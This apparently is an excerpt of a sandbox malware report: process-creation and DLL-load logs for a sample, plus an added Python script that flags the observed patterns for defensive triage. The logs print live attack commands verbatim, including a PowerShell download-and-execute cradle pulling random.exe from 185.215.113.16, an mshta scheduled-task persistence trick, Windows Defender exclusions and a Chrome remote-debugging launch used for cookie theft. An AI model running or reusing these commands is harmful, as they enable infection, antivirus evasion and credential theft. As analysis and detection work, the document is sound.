                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\YQNZByFp\jyidkjkfhjawd.exe "C:\YQNZByFp\jyidkjkfhjawd.exe"
                                      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Process created: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe "C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe"
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Process created: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe "C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe"
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\GIIIIJDHJE.exe"
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2532,i,194429869990168625,15952654104286526846,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Documents\GIIIIJDHJE.exe "C:\Users\user\Documents\GIIIIJDHJE.exe"
Source: C:\Users\user\Documents\GIIIIJDHJE.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe "C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp'
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe | Process created: C:\YQNZByFp\jyidkjkfhjawd.exe "C:\YQNZByFp\jyidkjkfhjawd.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\\random.hta"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
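Read together, the process-creation lines above are the behavioural evidence behind several of the report's signatures: DLTDCR8UJINP8YM8Y.exe starts chrome.exe with --remote-debugging-port=9229 (a process that drives Chrome over its DevTools port can ask the browser for its own decrypted cookies and saved logins, so the app-bound key never has to be attacked directly; this is the pattern behind "Attempt to bypass Chrome Application-Bound Encryption"), eXbhgU9.exe adds Windows Defender path exclusions with Add-MpPreference, am.cmd registers the AutoRunHTA task that copies a .gif to .hta and runs it with mshta every 25 minutes, and the HTA spawns a hidden PowerShell that downloads random.exe from 185.215.113.16 and starts it. The Python below is an added example and is not part of the Joe Sandbox report or of any of the analysed samples: it parses "Source: ... Process created: ..." lines as they appear on this page (with or without a separator between the two cells) and applies triage rules for those four patterns. The rule names, the list of parents allowed to start Chrome, and the explorer.exe control line are assumptions of the example; the other sample lines are copied from the report.

```python
"""Triage rules over the 'Process created' lines of a sandbox report.

Added example, not part of the Joe Sandbox report: it parses the raw
"Source: <parent> Process created: <image> <command line>" lines as they
appear on the page and flags the process-tree patterns behind the report's
signatures. Rule names and the list of parents that may legitimately start
Chrome are assumptions of this example.
"""
import re
from pathlib import PureWindowsPath

# Accepts both the fused form ("...mshta.exeProcess created: ...") and a
# form with a separator between the two cells ("... | Process created: ...").
LINE_RE = re.compile(r"^Source:\s*(?P<parent>.*?)\s*\|?\s*Process created:\s*(?P<rest>.*)$")
# The first token of the "Process created" cell is the image path; it may
# contain spaces (C:\Program Files\...), so cut at the first ".exe".
IMAGE_RE = re.compile(r"^(?P<image>.+?\.exe)(?:\s+(?P<cmd>.*))?$", re.I)

# Parents expected to launch chrome.exe; anything else starting Chrome with a
# DevTools port is suspicious. (Assumed list, not taken from the report.)
BENIGN_CHROME_PARENTS = {"chrome.exe", "explorer.exe"}


def basename(path):
    """Lower-case file name of a Windows path ('unknown' stays 'unknown')."""
    return PureWindowsPath(path).name.lower()


def parse_line(line):
    """Return {'parent', 'image', 'cmd'} for a report line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rest = m.group("rest")
    im = IMAGE_RE.match(rest)
    if im:
        image, cmd = im.group("image"), im.group("cmd") or ""
    else:  # e.g. "unknown unknown" for processes the sandbox could not resolve
        image, cmd = (rest.split(" ", 1) + [""])[:2]
    return {"parent": m.group("parent"), "image": image, "cmd": cmd}


def rule_chrome_remote_debugging(ev):
    """Chrome started with a DevTools port by a non-browser parent: whoever
    controls that port can pull cookies and logins through Chrome itself."""
    if basename(ev["image"]) != "chrome.exe":
        return None
    m = re.search(r"--remote-debugging-port=(\d+)", ev["cmd"])
    if m and basename(ev["parent"]) not in BENIGN_CHROME_PARENTS:
        return f"{basename(ev['parent'])} launched Chrome with DevTools port {m.group(1)}"
    return None


def rule_defender_exclusion(ev):
    """PowerShell adding a Windows Defender path exclusion."""
    c = ev["cmd"]
    if basename(ev["image"]) == "powershell.exe" and re.search(r"add-mppreference", c, re.I):
        m = re.search(r"-exclusionpath\s+'([^']+)'", c, re.I)
        return f"Defender exclusion added for {m.group(1) if m else '<unparsed>'}"
    return None


def rule_mshta_download_cradle(ev):
    """mshta.exe spawning PowerShell that downloads and starts a file."""
    c = ev["cmd"]
    if (basename(ev["parent"]) == "mshta.exe" and basename(ev["image"]) == "powershell.exe"
            and re.search(r"downloadfile\(", c, re.I)):
        m = re.search(r"downloadfile\('([^']+)'", c, re.I)
        return f"mshta-spawned PowerShell downloads {m.group(1) if m else '<unparsed>'}"
    return None


def rule_schtasks_hta_persistence(ev):
    """schtasks /create whose action runs mshta: HTA persistence."""
    c = ev["cmd"]
    if basename(ev["image"]) == "schtasks.exe" and re.search(r"/create", c, re.I) and "mshta" in c.lower():
        m = re.search(r'/tn\s+"([^"]+)"', c, re.I)
        return f"scheduled task {m.group(1) if m else '<unparsed>'} launches an HTA via mshta"
    return None


def rule_hta_masquerade(ev):
    """A .gif copied to .hta and handed to mshta: the HTA payload is kept
    under an image extension so it looks harmless on disk."""
    c = ev["cmd"].lower()
    if ".gif" in c and ".hta" in c and "mshta" in c:
        return "HTA payload stored as .gif is copied to .hta and run with mshta"
    return None


RULES = [rule_chrome_remote_debugging, rule_defender_exclusion,
         rule_mshta_download_cradle, rule_schtasks_hta_persistence, rule_hta_masquerade]


def triage(lines):
    """Apply every rule to every parseable line; returns (rule, image, detail) tuples."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        for rule in RULES:
            detail = rule(ev)
            if detail:
                findings.append((rule.__name__, basename(ev["image"]), detail))
    return findings


SAMPLE_LINES = [
    # Lines 1-5 are copied from the report above (line 5 in the fused form the
    # page uses); line 6 is a constructed benign Chrome launch for contrast.
    r'''Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""''',
    r'''Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users' ''',
    r'''Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;''',
    r'''Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f''',
    r'''Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" & start mshta "C:\Temp\\random.hta")''',
    r'''Source: C:\Windows\explorer.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"''',
]

if __name__ == "__main__":
    for rule, image, detail in triage(SAMPLE_LINES):
        print(f"[{rule}] {image}: {detail}")
```

On the six sample lines the rules fire six times: the DevTools launch, the 'C:\Users' exclusion, the download of http://185.215.113.16/mine/random.exe, the AutoRunHTA task (which trips both the schtasks rule and the .gif-to-.hta rule), the task action itself when it later runs from cmd.exe, and nothing at all for the explorer.exe control line. Adding 'C:\Users' as an exclusion is worth a dedicated alert on its own: it silently exempts every user profile on the host, so every later payload dropped under AppData or Documents goes unscanned.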
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Section loaded: rstrtmgr.dll
